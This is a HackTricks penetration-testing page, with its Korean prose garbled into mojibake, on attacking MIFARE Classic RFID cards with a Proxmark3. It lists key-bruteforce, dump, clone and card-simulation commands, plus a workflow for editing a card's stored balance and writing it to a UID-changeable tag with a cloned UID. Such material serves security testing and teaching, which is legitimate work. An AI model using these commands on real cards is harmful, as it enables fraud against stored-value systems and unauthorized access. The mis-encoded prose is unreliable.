Proxmark 3
Tip
AWS ํดํน ๋ฐฐ์ฐ๊ธฐ ๋ฐ ์ฐ์ตํ๊ธฐ:
HackTricks Training AWS Red Team Expert (ARTE)
GCP ํดํน ๋ฐฐ์ฐ๊ธฐ ๋ฐ ์ฐ์ตํ๊ธฐ:HackTricks Training GCP Red Team Expert (GRTE)
Azure ํดํน ๋ฐฐ์ฐ๊ธฐ ๋ฐ ์ฐ์ตํ๊ธฐ:
HackTricks Training Azure Red Team Expert (AzRTE)
HackTricks ์ง์ํ๊ธฐ
- ๊ตฌ๋ ๊ณํ ํ์ธํ๊ธฐ!
- **๐ฌ ๋์ค์ฝ๋ ๊ทธ๋ฃน ๋๋ ํ ๋ ๊ทธ๋จ ๊ทธ๋ฃน์ ์ฐธ์ฌํ๊ฑฐ๋ ํธ์ํฐ ๐ฆ @hacktricks_live๋ฅผ ํ๋ก์ฐํ์ธ์.
- HackTricks ๋ฐ HackTricks Cloud ๊นํ๋ธ ๋ฆฌํฌ์งํ ๋ฆฌ์ PR์ ์ ์ถํ์ฌ ํดํน ํธ๋ฆญ์ ๊ณต์ ํ์ธ์.
Proxmark3๋ก RFID ์์คํ ๊ณต๊ฒฉํ๊ธฐ
๊ฐ์ฅ ๋จผ์ ํด์ผ ํ ์ผ์ Proxmark3๋ฅผ ์ค๋นํ๊ณ install the software and itโs dependencies.
MIFARE Classic 1KB ๊ณต๊ฒฉ
์ด๋ 16 sectors, ๊ฐ ์นํฐ๋ 4 blocks์ด๋ฉฐ ๊ฐ ๋ธ๋ก์ 16B๋ฅผ ํฌํจํฉ๋๋ค. UID๋ sector 0 block 0์ ์์ผ๋ฉฐ(๋ณ๊ฒฝํ ์ ์์ต๋๋ค).
๊ฐ ์นํฐ์ ์ ๊ทผํ๋ ค๋ฉด ๊ฐ ์นํฐ์ block 3 of each sector(sector trailer)์ ์ ์ฅ๋ 2 keys(A and B)๊ฐ ํ์ํฉ๋๋ค. ์นํฐ ํธ๋ ์ผ๋ฌ๋ ๋ํ 2 keys๋ฅผ ์ฌ์ฉํ์ฌ each block์ ๋ํ read and write ๊ถํ์ ๋ถ์ฌํ๋ access bits๋ฅผ ์ ์ฅํฉ๋๋ค.
2 keys๋ ์๋ฅผ ๋ค์ด ์ฒซ ๋ฒ์งธ ํค๋ฅผ ์๋ฉด ์ฝ๊ธฐ ๊ถํ์, ๋ ๋ฒ์งธ ํค๋ฅผ ์๋ฉด ์ฐ๊ธฐ ๊ถํ์ ๋ถ์ฌํ๋ ์์ผ๋ก ์ ์ฉํฉ๋๋ค.
์ฌ๋ฌ ๊ณต๊ฒฉ์ ์ํํ ์ ์์ต๋๋ค
proxmark3> hf mf #List attacks
proxmark3> hf mf chk *1 ? t ./client/default_keys.dic #Keys bruteforce
proxmark3> hf mf fchk 1 t # Improved keys BF
proxmark3> hf mf rdbl 0 A FFFFFFFFFFFF # Read block 0 with the key
proxmark3> hf mf rdsc 0 A FFFFFFFFFFFF # Read sector 0 with the key
proxmark3> hf mf dump 1 # Dump the information of the card (using creds inside dumpkeys.bin)
proxmark3> hf mf restore # Copy data to a new card
proxmark3> hf mf eload hf-mf-B46F6F79-data # Simulate card using dump
proxmark3> hf mf sim *1 u 8c61b5b4 # Simulate card using memory
proxmark3> hf mf eset 01 000102030405060708090a0b0c0d0e0f # Write those bytes to block 1
proxmark3> hf mf eget 01 # Read block 1
proxmark3> hf mf wrbl 01 B FFFFFFFFFFFF 000102030405060708090a0b0c0d0e0f # Write to the card
The Proxmark3๋ ๋ฏผ๊ฐํ ๋ฐ์ดํฐ๋ฅผ ์ฐพ๊ธฐ ์ํด eavesdropping๊ณผ ๊ฐ์ด Tag to Reader communication์ ๋์ฒญํ๋ ๋ฑ ์ถ๊ฐ ๋์์ ์ํํ ์ ์์ต๋๋ค. ์ด ์นด๋์ ๊ฒฝ์ฐ ํต์ ์ ์ค๋ํํ ๋ค ์ฌ์ฉ๋ ํค๋ฅผ ๊ณ์ฐํ ์ ์๋๋ฐ, ๊ทธ ์ด์ ๋ cryptographic operations used are weakํ๋ฉฐ ํ๋ฌธ(plaintext)๊ณผ ์ํธ๋ฌธ(ciphertext)์ ์๋ฉด (mfkey64 ๋๊ตฌ) ํค๋ฅผ ๊ณ์ฐํ ์ ์๊ธฐ ๋๋ฌธ์
๋๋ค.
MiFare Classic์ ์ ์ฅ๊ฐ(stored-value) ์ ์ฉ์ ์ํ ๋น ๋ฅธ ์ํฌํ๋ก์ฐ
ํฐ๋ฏธ๋์ด Classic ์นด๋์ ์์ก์ ์ ์ฅํ ๋, ์ผ๋ฐ์ ์ธ ์๋ํฌ์๋ ํ๋ฆ์ ๋ค์๊ณผ ๊ฐ์ต๋๋ค:
# 1) Recover sector keys and dump full card
proxmark3> hf mf autopwn
# 2) Modify dump offline (adjust balance + integrity bytes)
# Use diffing of before/after top-up dumps to locate fields
# 3) Write modified dump to a UID-changeable ("Chinese magic") tag
proxmark3> hf mf cload -f modified.bin
# 4) Clone original UID so readers recognize the card
proxmark3> hf mf csetuid -u <original_uid>
๋ ธํธ
hf mf autopwn์ nested/darkside/HardNested-style ๊ณต๊ฒฉ์ ์กฐ์จํ๊ณ , keys๋ฅผ ๋ณต๊ตฌํ๋ฉฐ, client dumps folder์ ๋คํ๋ฅผ ์์ฑํฉ๋๋ค.- Writing block 0/UID๋ magic gen1a/gen2 ์นด๋์์๋ง ์๋ํฉ๋๋ค. ์ผ๋ฐ Classic ์นด๋๋ UID๊ฐ ์ฝ๊ธฐ ์ ์ฉ์ ๋๋ค.
- ๋ง์ ๋ฐฐํฌ์์๋ Classic โvalue blocksโ ๋๋ ๋จ์ํ checksums์ ์ฌ์ฉํฉ๋๋ค. ํธ์ง ํ ์ค๋ณต/๋ณด์๋ ํ๋์ checksums์ด ์ผ๊ด๋๋์ง ํ์ธํ์ธ์.
์์ ์์ค์ ๋ฐฉ๋ฒ๋ก ๋ฐ ์ํ์ฑ ์ ๋ค์์ ์ฐธ์กฐํ์ธ์:
Raw ๋ช ๋ น
IoT ์์คํ ์ ๋๋๋ก nonbranded or noncommercial tags๋ฅผ ์ฌ์ฉํฉ๋๋ค. ์ด ๊ฒฝ์ฐ Proxmark3๋ฅผ ์ฌ์ฉํด ํ๊ทธ๋ก ๋ณด๋ผ ์ปค์คํ raw ๋ช ๋ น์ ์ ์กํ ์ ์์ต๋๋ค.
proxmark3> hf search UID : 80 55 4b 6c ATQA : 00 04
SAK : 08 [2]
TYPE : NXP MIFARE CLASSIC 1k | Plus 2k SL1
proprietary non iso14443-4 card found, RATS not supported
No chinese magic backdoor command detected
Prng detection: WEAK
Valid ISO14443A Tag Found - Quiting Search
์ด ์ ๋ณด๋ฅผ ๊ฐ์ง๊ณ ์นด๋์ ๋ํ ์ ๋ณด์ ์นด๋์ ํต์ ํ๋ ๋ฐฉ๋ฒ์ ์ฐพ์๋ณผ ์ ์์ต๋๋ค. Proxmark3๋ ๋ค์๊ณผ ๊ฐ์ด ์์ ๋ช
๋ น์ ์ ์กํ ์ ์์ต๋๋ค: hf 14a raw -p -b 7 26
์คํฌ๋ฆฝํธ
Proxmark3 ์ํํธ์จ์ด์๋ ๊ฐ๋จํ ์์
์ ์ํํ ๋ ์ฌ์ฉํ ์ ์๋ ์๋ํ ์คํฌ๋ฆฝํธ ๋ชฉ๋ก์ด ๋ฏธ๋ฆฌ ํฌํจ๋์ด ์์ต๋๋ค. ์ ์ฒด ๋ชฉ๋ก์ ํ์ธํ๋ ค๋ฉด script list ๋ช
๋ น์ ์ฌ์ฉํ์ธ์. ๊ทธ๋ฐ ๋ค์ script run ๋ช
๋ น ๋ค์์ ์คํฌ๋ฆฝํธ ์ด๋ฆ์ ๋ถ์ฌ ์คํํฉ๋๋ค:
proxmark3> script run mfkeys
์คํฌ๋ฆฝํธ๋ฅผ ๋ง๋ค์ด fuzz tag readersํ ์ ์์ต๋๋ค. ์ฆ, valid card์ ๋ฐ์ดํฐ๋ฅผ ๋ณต์ฌํ ๋ค Lua script๋ก ํ๋ ์ด์์ ๋ฌด์์ bytes๋ฅผ randomizeํ๊ณ ๊ฐ ๋ฐ๋ณต์์ reader crashesํ๋์ง ํ์ธํ๋ฉด ๋ฉ๋๋ค.
์ฐธ๊ณ ์๋ฃ
- Proxmark3 wiki: HF MIFARE
- Proxmark3 wiki: HF Magic cards
- NXP statement on MIFARE Classic Crypto1
- NFC card vulnerability exploitation in KioSoft Stored Value (SEC Consult)
Tip
AWS ํดํน ๋ฐฐ์ฐ๊ธฐ ๋ฐ ์ฐ์ตํ๊ธฐ:
HackTricks Training AWS Red Team Expert (ARTE)
GCP ํดํน ๋ฐฐ์ฐ๊ธฐ ๋ฐ ์ฐ์ตํ๊ธฐ:HackTricks Training GCP Red Team Expert (GRTE)
Azure ํดํน ๋ฐฐ์ฐ๊ธฐ ๋ฐ ์ฐ์ตํ๊ธฐ:
HackTricks Training Azure Red Team Expert (AzRTE)
HackTricks ์ง์ํ๊ธฐ
- ๊ตฌ๋ ๊ณํ ํ์ธํ๊ธฐ!
- **๐ฌ ๋์ค์ฝ๋ ๊ทธ๋ฃน ๋๋ ํ ๋ ๊ทธ๋จ ๊ทธ๋ฃน์ ์ฐธ์ฌํ๊ฑฐ๋ ํธ์ํฐ ๐ฆ @hacktricks_live๋ฅผ ํ๋ก์ฐํ์ธ์.
- HackTricks ๋ฐ HackTricks Cloud ๊นํ๋ธ ๋ฆฌํฌ์งํ ๋ฆฌ์ PR์ ์ ์ถํ์ฌ ํดํน ํธ๋ฆญ์ ๊ณต์ ํ์ธ์.


